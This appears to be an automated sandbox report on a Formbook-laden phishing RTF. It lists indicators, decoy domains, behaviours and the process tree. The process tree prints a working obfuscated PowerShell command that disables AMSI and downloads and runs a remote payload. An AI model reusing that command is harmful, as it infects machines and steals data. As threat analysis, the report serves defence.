Analysis

  • max time kernel
    157s
  • max time network
    160s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    31-01-2022 07:25

General

  • Target

    New Order- P- 00302001.rtf

  • Size

    2.2MB

  • MD5

    75990fe7c7bfbcd68e3641ced2d184a9

  • SHA1

    1227f04860ae3d3137cd5e85b771cc6b339953a7

  • SHA256

    132a53a42ec7c727a4eeef4013293ab2e4f3b42d82f7c608f15879dea2de338e

  • SHA512

    b2a66f4e40143579223e832296b9031ac9fa9ed836759597bd52add562786bcac88c267ece49551e708edf323e14b2bb7fdd1159f211ef222f43b0ddc1e7fa3f

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

u3s4

Decoy

treducation.net

picashowapk.com

puzzletourny.club

alleenas.com

xgyvsf.icu

valencia-noticias.com

xooxd.pet

kikimodel.com

familyfx.win

halosg.com

ishrcb.com

867537.icu

aadibhatt.net

purebloodbanks.com

zhongwentao.top

slot777dunia.com

lesbonbonsdemamiejeanne.com

prune.digital

zsyqfk.com

yamamichi-satoshi.com

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Formbook Payload 2 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 23 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 26 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1220
    • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\New Order- P- 00302001.rtf"
      2⤵
      • Drops file in Windows directory
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1040
      • C:\Windows\splwow64.exe
        C:\Windows\splwow64.exe 12288
        3⤵
          PID:268
      • C:\Windows\SysWOW64\mstsc.exe
        "C:\Windows\SysWOW64\mstsc.exe"
        2⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1632
        • C:\Windows\SysWOW64\cmd.exe
          /c del "C:\WINDOWS\syswow64\calc.exe"
          3⤵
            PID:748
      • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
        1⤵
        • Launches Equation Editor
        • Suspicious use of WriteProcessMemory
        PID:1416
        • C:\Windows\SysWOW64\CmD.exe
          CmD.exe /C cscript %tmp%\Client.vbs A C
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1524
          • C:\Windows\SysWOW64\cscript.exe
            cscript C:\Users\Admin\AppData\Local\Temp\Client.vbs A C
            3⤵
              PID:272
        • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
          Powershell $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1);$7558868699854837583393=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,100,114,111,112,109,98,46,99,111,109,47,102,105,108,101,115,47,55,48,55,52,99,52,50,56,52,54,51,101,52,56,56,97,53,101,53,48,54,55,55,52,53,98,98,101,97,53,100,53,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($7558868699854837583393)|I`E`X
          1⤵
          • Process spawned unexpected child process
          • Blocklisted process makes network request
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1868
          • C:\WINDOWS\syswow64\calc.exe
            "{Path}"
            2⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            PID:1544

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Execution

        Exploitation for Client Execution

        1
        T1203

        Defense Evasion

        Modify Registry

        1
        T1112

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\Client.vbs
          MD5

          72a42b83839bf36cd8ca5fdd2b3e32bd

          SHA1

          dbabcbead51d25c613c6aad60e3a0c03ea922e83

          SHA256

          76ae8904af136ae80b1d5d503ed57670f78f6b6fc48047ad9e16290b8dae615d

          SHA512

          fff1261211ca75659e266f4877b8b129e0bde489c818d8e53507f952e44600a66e42a397a98b89726ce7a8486fb29b84a5b5bfb7f60995df6160ff766b0b4cca

        • memory/1040-54-0x0000000072111000-0x0000000072114000-memory.dmp
          Filesize

          12KB

        • memory/1040-55-0x000000006FB91000-0x000000006FB93000-memory.dmp
          Filesize

          8KB

        • memory/1040-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
          Filesize

          64KB

        • memory/1040-57-0x00000000754B1000-0x00000000754B3000-memory.dmp
          Filesize

          8KB

        • memory/1040-87-0x000000005FFF0000-0x0000000060000000-memory.dmp
          Filesize

          64KB

        • memory/1220-80-0x0000000004B50000-0x0000000004C09000-memory.dmp
          Filesize

          740KB

        • memory/1220-86-0x0000000004C10000-0x0000000004CE3000-memory.dmp
          Filesize

          844KB

        • memory/1544-74-0x0000000000400000-0x000000000042F000-memory.dmp
          Filesize

          188KB

        • memory/1544-79-0x0000000000250000-0x0000000000264000-memory.dmp
          Filesize

          80KB

        • memory/1544-77-0x0000000000A20000-0x0000000000D23000-memory.dmp
          Filesize

          3.0MB

        • memory/1544-76-0x0000000000400000-0x000000000042F000-memory.dmp
          Filesize

          188KB

        • memory/1544-75-0x0000000000400000-0x000000000042F000-memory.dmp
          Filesize

          188KB

        • memory/1632-85-0x0000000002030000-0x00000000020C3000-memory.dmp
          Filesize

          588KB

        • memory/1632-84-0x00000000021C0000-0x00000000024C3000-memory.dmp
          Filesize

          3.0MB

        • memory/1632-83-0x00000000001A0000-0x00000000001CF000-memory.dmp
          Filesize

          188KB

        • memory/1632-82-0x0000000000090000-0x0000000000194000-memory.dmp
          Filesize

          1.0MB

        • memory/1868-64-0x0000000002762000-0x0000000002764000-memory.dmp
          Filesize

          8KB

        • memory/1868-73-0x0000000002794000-0x0000000002795000-memory.dmp
          Filesize

          4KB

        • memory/1868-72-0x000000000278F000-0x0000000002790000-memory.dmp
          Filesize

          4KB

        • memory/1868-71-0x000000000278E000-0x000000000278F000-memory.dmp
          Filesize

          4KB

        • memory/1868-70-0x0000000002791000-0x0000000002792000-memory.dmp
          Filesize

          4KB

        • memory/1868-69-0x0000000002792000-0x0000000002794000-memory.dmp
          Filesize

          8KB

        • memory/1868-67-0x000000000276B000-0x000000000278A000-memory.dmp
          Filesize

          124KB

        • memory/1868-66-0x000000001B7B0000-0x000000001BAAF000-memory.dmp
          Filesize

          3.0MB

        • memory/1868-62-0x000007FEF26C0000-0x000007FEF321D000-memory.dmp
          Filesize

          11.4MB

        • memory/1868-65-0x0000000002764000-0x0000000002767000-memory.dmp
          Filesize

          12KB

        • memory/1868-63-0x0000000002760000-0x0000000002762000-memory.dmp
          Filesize

          8KB

        • memory/1868-61-0x000007FEFB571000-0x000007FEFB573000-memory.dmp
          Filesize

          8KB